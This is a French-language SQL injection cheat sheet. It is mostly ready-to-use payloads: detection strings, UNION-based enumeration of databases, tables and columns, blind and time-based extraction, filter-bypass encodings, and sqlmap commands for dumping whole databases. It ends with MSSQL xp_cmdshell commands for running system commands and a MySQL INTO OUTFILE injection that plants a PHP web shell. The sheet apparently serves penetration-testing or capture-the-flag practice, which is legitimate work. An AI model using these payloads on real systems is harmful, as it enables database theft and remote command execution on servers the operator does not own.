SQL Injection – Cheatsheet

By : Li_in
SQL Injection

Utiles

Détection
----------------------------------------------
| ' | " | ` | ') | ") | `) | ')) | ")) | `)) |
----------------------------------------------


#comment
--comment
-- comment    //space required
/*comment*/
/*! MYSQL Special SQL */

' OR 1=1 -- -

' OR 1=1 --

' OR '1'='1

'XOR(if(now()=sysdate(),sleep(10),0))OR'
Simple requête SQL
SELECT a,0 FROM 0xtable WHERE name = 'test'
Trouver le nombre de champs
1' ORDER BY 1--+    #True
1' ORDER BY 2--+    #True
1' ORDER BY 3--+    #True  <<< OK
1' ORDER BY 4--+    #False 

1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #True <<< OK
1' GROUP BY 4--+    #False

1' UNION SELECT null-- Don't work
1' UNION SELECT null,null-- Don't work
1' UNION SELECT null,null,null-- Work <<< OK
Lister les bases de données
' UNION SELECT 0,schema_name,0 FROM information_schema.schemata
Lister les tables
' UNION SELECT 0,table_name,0 FROM information_schema.tables WHERE table_schema=<database>
Lister les colonnes
' UNION SELECT 0,column_name,0 FROM information_schema.columns WHERE table_name=<table>
Dump la base de données entière
SELECT '',databse_to_xml(true, true, '')::text,''
Extraire sans connaître le nom des colonnes
SELECT * FROM 0xtable

SELECT 0,*,0 FROM 0xtable

# Extraction de la 3eme colonne de 0xtable 
SELECT 0,T.3,0 FROM (SELECT 1, 2, 3, .. , size_of_0xtable UNION SELECT * FROM 0xtable ) T;

Blind SQLI

Retourne une valeur true si une correspondance est trouvée.

SELECT SUBSTR(name,1,1) FROM 0xtable = 'A'
SELECT SUBSTR(name,1,1) FROM 0xtable = 'B'
SELECT SUBSTR(name,1,1) FROM 0xtable = 'C'
...
...
SELECT SUBSTR(name,5,1) FROM 0xtable = 'A'
SELECT SUBSTR(name,5,1) FROM 0xtable = 'B'
SELECT SUBSTR(name,5,1) FROM 0xtable = 'C'

Time Based SQLI

Temps de traitement de la requête supérieur si une correspondance est trouvée.

SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,1,1) = 'A'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,1,1) = 'B'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,1,1) = 'C'
...
...
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,5,1) = 'A'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,5,1) = 'B'
SELECT sleep(10) FROM 0xtable WHERE SUBSTR(name,5,1) = 'C'

Bypass de filtres

Pas d’espace

?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--

?id=1/*comment*/and/**/1=1/**/--

?id=(1)and(1)=(1)--

Pas de virgule

LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

SQLMAP

Non Authentifié

Scan :

sqlmap -u "<url>"

Enumérer les bases de données :

sqlmap -u "<url>" --dbs

Enumérer les tables :

sqlmap -u "<url>" -D <database> --tables

Dump d’une table :

sqlmap -u "<url>" -D <database> -T <table> --dump

Dump de la base de données :

sqlmap -u "<url>" --dump

Authentifié

Générer une requête http depuis le formulaire vulnérable et récupérer son contenu (avec burpsuite ou le navigateur). Sauvegarder le contenu dans un fichier request.txt :

POST /dashboard.php HTTP/1.1
Host: 10.10.195.229
Content-Length: 15
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.195.229
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.195.229/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=h12mn21j4k6dl7d0997qsvuj64
Connection: close

search=test

Lancer sqlmap en lui indiquant le fichier de la requête ainsi que le type de base de données :

sqlmap -r <request.txt> --dump

Execution

MSSQL

Interactif
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
Injection :

Ne retourne pas de résultat de la commande.

'; EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --

'; EXECUTE xp_cmdshell "<command>"; --

MySQL

Injection :
' UNION ALL SELECT NULL,'<?php system($_GET["cmd"]);?>',NULL INTO OUTFILE '/var/www/html/tmp/webshell.php'-- -